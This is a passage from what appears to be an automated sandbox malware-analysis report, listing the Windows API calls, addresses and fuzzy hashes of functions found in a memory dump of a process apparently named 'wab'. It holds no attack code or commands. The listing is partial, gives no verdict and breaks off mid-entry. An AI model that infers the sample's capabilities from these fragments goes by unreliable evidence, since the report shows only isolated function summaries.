                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                                                                                • memcpy.MSVCRT ref: 0040B248
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3023356884-0
                                                                                                                                                • Opcode ID: 265e11fb3b93f6842ac601c308daddd794573f9d2d057257d07b24b118d7ea2e
                                                                                                                                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                • Opcode Fuzzy Hash: 265e11fb3b93f6842ac601c308daddd794573f9d2d057257d07b24b118d7ea2e
                                                                                                                                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: @
                                                                                                                                                • API String ID: 3510742995-2766056989
                                                                                                                                                • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1865533344-0
                                                                                                                                                • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                                                                                • memcpy.MSVCRT ref: 0040B159
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1171893557-0
                                                                                                                                                • Opcode ID: d8b96de248f7d7037f9e30158b7ab90977b72bd63dac2b37973b5005ce90d3f5
                                                                                                                                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                • Opcode Fuzzy Hash: d8b96de248f7d7037f9e30158b7ab90977b72bd63dac2b37973b5005ce90d3f5
                                                                                                                                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004144E7
                                                                                                                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                  • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                • memset.MSVCRT ref: 0041451A
                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1127616056-0
                                                                                                                                                • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                • String ID: sqlite_master
                                                                                                                                                • API String ID: 438689982-3163232059
                                                                                                                                                • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3917621476-0
                                                                                                                                                • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 822687973-0
                                                                                                                                                • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7719DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                • malloc.MSVCRT ref: 00417459
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7719DF80,?,0041755F,?), ref: 00417478
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4284152360-0
                                                                                                                                                • Opcode ID: 35e3d96e4e8f16596d993fb63affbe7c511ca80ecd689a4fb8a2c9eba3d4a450
                                                                                                                                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                • Opcode Fuzzy Hash: 35e3d96e4e8f16596d993fb63affbe7c511ca80ecd689a4fb8a2c9eba3d4a450
                                                                                                                                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2678498856-0
                                                                                                                                                • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Item
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3888421826-0
                                                                                                                                                • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00417B7B
                                                                                                                                                • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3727323765-0
                                                                                                                                                • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                • malloc.MSVCRT ref: 00417407
                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4284152360-0
                                                                                                                                                • Opcode ID: a2ae8ec016122b8f6e3efdb0c2476e7f426d1c5b61e32c0c73e3f87cc7c6b3a1
                                                                                                                                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                • Opcode Fuzzy Hash: a2ae8ec016122b8f6e3efdb0c2476e7f426d1c5b61e32c0c73e3f87cc7c6b3a1
                                                                                                                                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040F673
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00402FD7
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                • strlen.MSVCRT ref: 00403006
                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 764393265-0
                                                                                                                                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$System$File$LocalSpecific
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 979780441-0
                                                                                                                                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT ref: 004134E0
                                                                                                                                                • memcpy.MSVCRT ref: 004134F2
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1386444988-0
                                                                                                                                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InvalidateMessageRectSend
                                                                                                                                                • String ID: d=E
                                                                                                                                                • API String ID: 909852535-3703654223
                                                                                                                                                • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
